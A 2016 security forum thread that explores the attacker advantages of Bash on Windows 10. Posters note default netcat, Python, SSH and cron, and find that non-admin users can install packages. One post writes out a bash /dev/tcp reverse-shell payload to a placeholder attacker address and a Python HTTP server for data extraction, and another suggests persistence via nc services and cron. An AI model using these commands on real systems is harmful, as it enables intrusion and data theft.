Jump to content
_VL_

BASH on Windows 10

Recommended Posts

_VL_

I assume everyone is familiar with this:

 

Quote

You can now run Bash scripts, Linux command-line tools like sed, awk, grep, and you can even try Linux-first tools like Ruby, Git, Python, etc. directly on Windows. You can also access your Windows filesystem from within Bash allowing you to work on the same set of files using your preferred Windows tools or Linux command-line tools

https://blogs.windows.com/buildingapps/2016/03/30/run-bash-on-ubuntu-on-windows/

 

What advantages does this bring to an attacker if a developer installs this?  I installed it Windows 10 on a VM and then went through the process of updating to Insider Preview build 14316. 

To start BASH you open cmd.exe and type in "bash" in same way you would to start powershell from cmd. You'll notice that you instantly have root. There is no need to "su".

I tried writing "C:\Windows" as a test and got a write permission error. I'm assuming it has something to do with how the Windows volume is mounted. I'm still trying to find a way around that. 

I've only just begun playing with it, but so far I found the following installed by default:

  • Netcat
  • Perl
  • Python

I was able to use the following payload to get a reverse listener:

bash -i >& /dev/tcp/<ip_address>/<port> 0>&1

Since Python is installed this is another option for data extraction:

python -m SimpleHTTPServer <port>

Share this post


Link to post
GiRa

I still have to try it but the very first things that comes to mind are:

 - service for you plus bash or nc to get persistence

- check if there is a cron implementation of some kind

- check for ssh

- messing around with the *nix permissions vs the Windows permissions, I bet there is something funky there

 

Share this post


Link to post
_VL_
On 4/13/2016 at 1:30 AM, GiRa said:

I still have to try it but the very first things that comes to mind are:

 - service for you plus bash or nc to get persistence

- check if there is a cron implementation of some kind

- check for ssh

- messing around with the *nix permissions vs the Windows permissions, I bet there is something funky there

 

SSH is installed as well as OpenSSH server:

Quote

root@localhost:/mnt/c/Users/test# apt-get install openssh-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
openssh-server is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@localhost:/mnt/c/Users/test#

Cron is also installed much to my surprise

Just found this article:

http://www.pcworld.com/article/3051604/windows/linuxs-deadliest-command-doesnt-faze-bash-on-windows-10.html

Seems that Root != Administrator on Windows. That's important to note.

Share this post


Link to post
_VL_

Yes. I should have guessed this. Once I opened cmd.exe as administrator I then had permissions from within BASH to write to "C:\Windows".

Share this post


Link to post
_VL_

So this is interesting. I created normal user on Windows 10 (not an administrator), switched to the account and had this experience:

 

  1. Typed in "BASH". This made me type "y" again, download BASH from the Windows Store and install it. # remember that this is without Administrative rights.
  2. I was then able to install whatever I want from BASH without administrative rights.

Seems like this is ripe for abuse. One example, I was able to install NMAP.

I did run into this when I tried to run a scan:

Quote

root@localhost:/mnt/c/Users/test# nmap scanme.nmap.org

Starting Nmap 6.40 ( http://nmap.org ) at 2016-04-14 22:44 UTC
route_dst_netlink: cannot create AF_NETLINK socket: Invalid argument

Seems like they haven't completely integrated all of Linux networking features into BASH for Windows yet.

Share this post


Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
×